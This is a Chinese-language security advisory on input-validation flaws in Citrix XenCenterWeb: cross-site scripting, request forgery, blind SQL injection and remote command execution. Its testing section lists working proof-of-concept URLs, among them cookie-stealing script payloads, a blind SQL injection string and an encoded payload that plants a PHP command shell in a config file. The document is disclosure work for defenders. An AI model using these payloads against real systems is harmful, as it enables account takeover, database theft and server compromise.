安全研究

安全漏洞
Citrix XenCenterWeb多个输入验证漏洞

发布日期:2009-07-07
更新日期:2009-07-08

受影响系统:
Citrix XenCenterWeb
描述:
BUGTRAQ  ID: 35592
CVE(CAN) ID: CVE-2009-3757,CVE-2009-3758,CVE-2009-3759,CVE-2009-3760

Citrix XenCenterWeb是用于管理Citrix XenServer环境的web界面。

XenCenterWeb的多个模块没有正确的验证用户所提供的输入,远程攻击者可以通过向服务器提交恶意请求执行跨站脚本、跨站请求伪造、SQL注入和代码注入等攻击。

(a) 跨站脚本和跨站请求伪造

在默认的PHP配置中(register_globals=Off且magic_quotes_gpc=On),可以通过向edituser.php脚本提交恶意的username参数执行跨站脚本和跨站请求伪造攻击。

(b) SQL注入

远程攻击者可以通过向login.php脚本提交恶意的username参数执行SQL盲注,检索整个数据库。

(c) 远程命令执行

远程攻击者可以通过/var/www/config/writeconfig.php文件向/usr/local/lib/php/include/config.ini.php文件写入任意数据,因此可以在机器上执行任意命令。

<*来源:Alberto Trivero (trivero@jumpy.it
  
  链接:http://marc.info/?l=bugtraq&m=124698937410084&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

https://www.example.com/config/edituser.php?username=1&lt;script&gt;alert(document.cookie)&lt;/script&gt;
https://www.example.com/config/changepw.php?username=[victim_username]&amp;newpass=[attacker&#039;s_chosen_pwd]
https://www.example.com/hardstopvm.php?stop_vmref=[VMref]&amp;stop_vmname=[VMname]
https://www.example.com/console.php?location=1&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;&lt;&quot;&amp;vmname=myVM
https://www.example.com/console.php?location=1&amp;sessionid=1&quot;&gt;&lt;script&gt;alert(123)&lt;/script&gt;&lt;&quot;&amp;vmname=myVM
https://www.example.com/console.php?location=1&amp;sessionid=1&amp;vmname=myVM&lt;script&gt;alert(123)&lt;/script&gt;
https://www.example.com/forcerestart.php?vmrefid=1&quot;&gt;&lt;script&gt;alert(123)&lt;/script&gt;&lt;&quot;&amp;vmname=myVM
https://www.example.com/forcerestart.php?vmrefid=1&amp;vmname=myVM&quot;&gt;&lt;script&gt;alert(123)&lt;/script&gt;&lt;&quot;
https://www.example.com/forcesd.php?vmrefid=1&amp;vmname=myVM&quot;&gt;&lt;script&gt;alert(123)&lt;/script&gt;&lt;&quot;
https://www.example.com/forcesd.php?vmrefid=1&quot;&gt;&lt;script&gt;alert(123)&lt;/script&gt;&lt;&quot;&amp;vmname=myVM
https://www.example.com/login.php?username=user&#039; UNION SELECT if(user() LIKE &#039;root@%&#039;, benchmark(1000000,sha1(&#039;test&#039;)), &#039;false&#039;
https://www.example.com/config/writeconfig.php?pool1=%27%3B%20%3F%3E%20%3C%3Fphp%20%24cmd%20%3D%20%24_REQUEST%5B%27cmd%27%5D%3B%20passthru%28%24cmd%29%3B%20%3F%3E%20

建议:
厂商补丁:

Citrix
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.citrix.com

浏览次数:2437
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障